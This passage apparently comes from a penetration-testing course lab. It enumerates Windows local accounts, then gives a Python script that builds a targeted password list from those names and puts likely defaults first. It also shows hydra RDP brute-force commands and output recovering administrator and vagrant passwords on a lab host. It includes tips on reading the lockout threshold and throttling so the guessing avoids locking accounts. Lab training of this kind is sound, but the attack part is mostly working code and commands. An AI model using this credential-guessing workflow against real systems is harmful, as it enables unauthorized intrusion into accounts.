10/05/2020  10:25 PM    <DIR>          sshd_server
10/05/2020  10:53 PM    <DIR>          vagrant
               0 File(s)              0 bytes
               7 Dir(s)  46,855,233,536 bytes free
net user lists every local account, while the profile directories under C:\Users show which of them have actually logged on (Administrator, sshd_server and vagrant); those are the first candidates to guess against. Run `net accounts` from this shell as well to read the lockout threshold before you start guessing, so the attack does not lock the accounts out.
Step 5: Generate the password dictionary file
See Figures 11 and 12.
Figure 11
Figure 12
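Figures 11 and 12 are not reproduced here, so as an added example (written for this page, not the lab's own dictionary tool) here is one way to build the list from what step 4 returned: the account names themselves, their underscore-separated parts, case and suffix variants, and a short list of default passwords placed first so that the likeliest guesses come before the long tail. NET_USER_OUTPUT is the transcript above pasted in; the default-password list and the suffix list are assumptions, with "vagrant" included because the hydra run in step 6 finds it.

```python
"""Build a targeted password list from `net user` output (added example, not lab code)."""
import itertools
from typing import Iterable, Iterator, List

# Pasted from the lab transcript; the host name after the backslashes is missing there too.
NET_USER_OUTPUT = r"""
User accounts for \\

-------------------------------------------------------------------------------
Administrator            anakin_skywalker         artoo_detoo
ben_kenobi               boba_fett                c_three_pio
chewbacca                darth_vader              greedo
Guest                    han_solo                 jabba_hutt
jarjar_binks             kylo_ren                 lando_calrissian
leia_organa              luke_skywalker           sshd
sshd_server              vagrant
The command completed with one or more errors.
"""

# Assumed defaults to try first; "vagrant" is the one the lab's hydra run found.
COMMON_DEFAULTS = ["vagrant", "password", "Password1", "admin", "welcome"]
# Assumed suffixes: the lab year, the year before, and the usual padding.
SUFFIXES = ["", "1", "123", "!", "2021", "2020"]


def extract_usernames(net_user_text: str) -> List[str]:
    """Return the account names: everything between the dashed line and the footer."""
    names, in_table = [], False
    for line in net_user_text.splitlines():
        stripped = line.strip()
        if stripped and set(stripped) == {"-"}:
            in_table = True
            continue
        if stripped.startswith("The command completed"):
            break
        if in_table and stripped:
            names.extend(stripped.split())
    return names


def candidates_for(name: str) -> Iterator[str]:
    """Passwords derived from one account name: whole name, its parts, case and suffix variants."""
    parts = [p for p in name.lower().split("_") if len(p) >= 3]      # drop 'c' in c_three_pio
    bases = sorted({name.lower(), "".join(parts), *parts} - {""}, key=lambda b: (-len(b), b))
    for base in bases:
        for variant in (base, base.capitalize(), base.upper(), base.replace("o", "0")):
            for suffix in SUFFIXES:
                yield variant + suffix


def build_wordlist(net_user_text: str, extra: Iterable[str] = COMMON_DEFAULTS) -> List[str]:
    """Defaults first, then per-account candidates, de-duplicated in a stable order."""
    seen, words = set(), []
    streams = [candidates_for(n) for n in extract_usernames(net_user_text)]
    for word in itertools.chain(extra, *streams):
        if word not in seen:
            seen.add(word)
            words.append(word)
    return words


if __name__ == "__main__":
    import sys
    out = sys.argv[1] if len(sys.argv) > 1 else "targeted.txt"
    wordlist = build_wordlist(NET_USER_OUTPUT)
    with open(out, "w") as fh:
        fh.write("\n".join(wordlist) + "\n")
    print(f"[*] wrote {len(wordlist)} candidates to {out}")
```

Feed the file to hydra with the throttling it asks for, for example `hydra -l administrator -P targeted.txt -t 4 -W 1 192.168.10.145 rdp`. A list built from the account names is a few hundred entries rather than two thousand, which matters when the lockout threshold you read with `net accounts` is non-zero: a generic list would lock the account long before it finished.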
Step 6: Brute-force with hydra
┌──(root💀localhost)-[~/桌面]
└─# hydra -l administrator -P safe6pass.txt 192.168.10.145 rdp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https:
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 2058 login tries (l:1/p:2058), ~515 tries per task
[DATA] attacking rdp://192.168.10.145:3389/
[3389][rdp] host: 192.168.10.145   login: administrator   password: vagrant
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-22 12:33:17

┌──(root💀localhost)-[~/桌面]
└─# hydra -l vagrant -P safe6pass.txt 192.168.10.145 rdp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-22 12:34:43
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 2058 login tries (l:1/p:2058), ~515 tries per task
[DATA] attacking rdp:
[3389][rdp] host: 192.168.10.145   login: vagrant   password: vagrant
1 of 1 target successfully completed, 1 valid password found
Hydra (https:
Both Administrator and vagrant use the password vagrant, so the administrator access that the LOCAL SERVICE session could not provide is now available over RDP. Two things worth taking from hydra's own messages: keep -t at 1 to 4 and add -W 1 so the RDP service is not overwhelmed (hydra's rdp module is marked experimental and drops connections under load), and note that a hydra.restore file left by an aborted run is picked up on the next start unless you pass -I.
https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/PENTEST/DAY02/CASE/01/index.html